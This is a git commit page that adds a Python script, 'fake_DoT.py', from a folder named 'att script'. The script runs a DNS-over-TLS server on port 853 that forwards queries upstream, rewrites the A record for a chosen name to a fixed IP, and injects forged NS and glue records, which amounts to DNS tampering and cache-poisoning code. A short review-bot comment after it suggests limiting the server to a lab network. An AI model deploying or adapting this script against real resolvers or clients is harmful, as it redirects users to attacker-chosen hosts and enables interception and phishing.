| author | 仇渝淇 <[email protected]> | 2023-11-22 13:29:32 +0000 |
|---|---|---|
| committer | 仇渝淇 <[email protected]> | 2023-11-22 13:29:32 +0000 |
| commit | 270c170cb7cf8c978835aebfd1e15298ce099c4e (patch) | |
| tree | 1e39521b1a40395a90e90673dbf4a0f3ef27a29d | |
| parent | 2b4d97deb5fd20891edc71e5d1ed0c6f232d3740 (diff) | |
Upload New File
| -rw-r--r-- | att script/12/fake_DoT.py | 63 |
1 files changed, 63 insertions, 0 deletions
diff --git a/att script/12/fake_DoT.py b/att script/12/fake_DoT.py
new file mode 100644
index 0000000..4e45754
--- /dev/null
+++ b/att script/12/fake_DoT.py
@@ -0,0 +1,63 @@
+import argparse
+import asyncio
+import ssl
+import socket
+import dns.asyncquery
+import dns.message
+import dns.rcode
+import dns.flags
+import dns.message
+import dns.rrset
+from dnslib import DNSRecord
+
+async def handle_client(reader, writer):
+ request_data = await reader.read(1024)
+ request = dns.message.from_wire(request_data[2:])
+ #print(request)
+ dns_request = dns.message.make_query(request.question[0].name, request.question[0].rdtype)
+ dns_request.id = request.id
+ #print(dns_request)
+ dns_response = await dns.asyncquery.udp(q=dns_request, port=53, where='223.5.5.5')
+ #print(dns_response)
+ if str(request.question[0].name) == tamper and int(request.question[0].rdtype) == 1:
+ print('---tamper---', tamper)
+ dns_response.answer = [dns.rrset.from_text(tamper, 3600, dns.rdataclass.IN, dns.rdatatype.A, '39.106.44.126')]
+ if str(request.question[0].name) == inject:
+ print('---inject---', inject)
+ dns_response.additional = [dns.rrset.from_text(inject,3600,dns.rdataclass.IN, dns.rdatatype.NS,'ns.'+inject.split('.',1)[1]),
+ dns.rrset.from_text('ns.'+inject.split('.',1)[1],3600,dns.rdataclass.IN, dns.rdatatype.A,ns)]
+ #print(dns_response)
+
+ response_data = dns_response
+ record_header = len(response_data.to_wire()).to_bytes(2, 'big')
+ # 构建完整的TLS响应数据
+ tls_response_data = record_header + response_data.to_wire()
+ writer.write(tls_response_data)
+ await writer.drain()
+ writer.close()
+
+async def start_server():
+ # 配置服务器参数
+ listen_address = '0.0.0.0'
+ listen_port = 853
+ CERT_FILE = "/usr/local/etc/unbound/cert_new4/app.crt" # 替换为你的SSL证书文件路径
+ KEY_FILE = "/usr/local/etc/unbound/cert_new4/app.key" # 替换为你的SSL密钥文件路径
+ context = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
+ context.load_cert_chain(certfile=CERT_FILE, keyfile=KEY_FILE)
+ # 创建TCP服务器
+ server = await asyncio.start_server(
+ handle_client, listen_address, listen_port, ssl=context)
+
+ print(f'DoT server listening on {listen_address}:{listen_port}')
+ async with server:
+ await server.serve_forever()
+
+parser = argparse.ArgumentParser()
+parser.add_argument('-tamper', '--tamper', default='')
+parser.add_argument('-inject', '--inject', default='')
+parser.add_argument('-ns', '--ns', default='39.106.44.126')
+args = parser.parse_args()
+tamper = args.tamper +'.'
+inject = args.inject +'.'
+ns = args.ns
+asyncio.run(start_server())
\ No newline at end of file |
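Review bot: Nothing in the file says that this is a response-rewriting test fixture, and `start_server` binds it to `0.0.0.0:853`, so every host that can reach the port receives the modified answers, not just the resolver under test. I would add a module docstring stating the intended lab scope and make the bind address explicit, e.g. `listen_address = '127.0.0.1'` with a `--listen` argument for the isolated test network. The `-ns` default and the A record in the tamper branch are the hard-coded routable address `39.106.44.126`; making that argument required, or defaulting to a documentation-range address, avoids steering clients to a host the operator may not control later. With the empty defaults `tamper` and `inject` both become `'.'`, so a root-name query enters the rewrite branches even when neither flag was given; testing `args.tamper` / `args.inject` for emptiness before comparing would keep the server a plain forwarder in that case.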
